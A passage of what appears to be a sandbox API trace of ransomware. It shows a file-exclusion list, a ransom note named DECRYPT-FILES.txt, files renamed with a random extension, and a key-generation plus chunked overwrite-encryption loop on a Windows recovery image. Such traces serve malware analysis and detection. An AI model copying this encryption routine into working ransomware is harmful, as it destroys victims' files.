lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0071.652] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0071.652] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0071.652] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0071.652] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0071.652] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0071.652] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0071.652] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0071.652] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0071.652] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0071.652] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0071.652] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0071.652] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0071.652] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0071.652] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0071.652] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0071.652] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0071.652] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0071.652] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0071.652] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0071.653] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0071.653] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0071.653] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0071.653] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0071.653] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0071.653] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0071.653] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0071.653] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0071.653] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0071.653] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0071.653] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0071.653] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0071.653] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 57 [0071.653] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.VKaq") returned 62 [0071.653] MoveFileExW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.VKaq" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.vkaq"), dwFlags=0x0) returned 1 [0071.654] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.654] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.655] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.655] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6cda6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.655] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.655] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6cda6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.655] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.655] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.655] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.655] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.655] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.655] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.655] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 49 [0071.655] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.655] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0071.655] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\jkbimi8.tmp") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\jkbimi8.tmp" [0071.655] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.656] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\jkbimi8.tmp" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.656] CloseHandle (hObject=0x0) returned 0 [0071.656] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.656] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="DECRYPT-FILES.txt") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="autorun.inf") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="boot.ini") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="desktop.ini") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="iconcache.db") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="bootsect.bak") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat.log") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="thumbs.db") returned 1 [0071.656] lstrcmpiW (lpString1="Winre.wim", lpString2="Bootfont.bin") returned 1 [0071.656] lstrlenW (lpString="Winre.wim") returned 9 [0071.656] lstrcmpiW (lpString1="wim", lpString2="lnk") returned 1 [0071.656] lstrcmpiW (lpString1="wim", lpString2="exe") returned 1 [0071.656] lstrcmpiW (lpString1="wim", lpString2="sys") returned 1 [0071.656] lstrcmpiW (lpString1="wim", lpString2="dll") returned 1 [0071.657] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 49 [0071.657] lstrlenW (lpString="Winre.wim") returned 9 [0071.657] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0071.657] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="Winre.wim" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0071.657] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.660] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0071.662] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3f2e1f0 | out: lpFileSize=0x3f2e1f0*=169213970) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.662] ReadFile (in: hFile=0x430, lpBuffer=0x3f2e1fc, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x3f2e1f8, lpOverlapped=0x0 | out: lpBuffer=0x3f2e1fc*, lpNumberOfBytesRead=0x3f2e1f8*=0x108, lpOverlapped=0x0) returned 1 [0071.667] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.667] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0071.667] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0071.667] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f2e1f0*, pdwDataLen=0x3f2e1dc*=0x28, dwBufLen=0x100 | out: pbData=0x3f2e1f0*, pdwDataLen=0x3f2e1dc*=0x100) returned 1 [0071.667] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x3aa0000 [0071.668] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x4110000 [0071.668] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.707] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.707] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.710] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.729] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.730] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.732] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.759] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.759] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.761] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.780] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.780] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.783] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.808] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.808] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.810] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.836] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.836] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.838] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.864] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.864] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.867] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.892] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.892] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.895] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.965] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.965] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.968] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0071.995] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.995] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0071.998] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.009] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.009] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.012] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.038] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.038] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.041] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.051] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.051] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.055] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.091] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.091] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.094] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.104] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 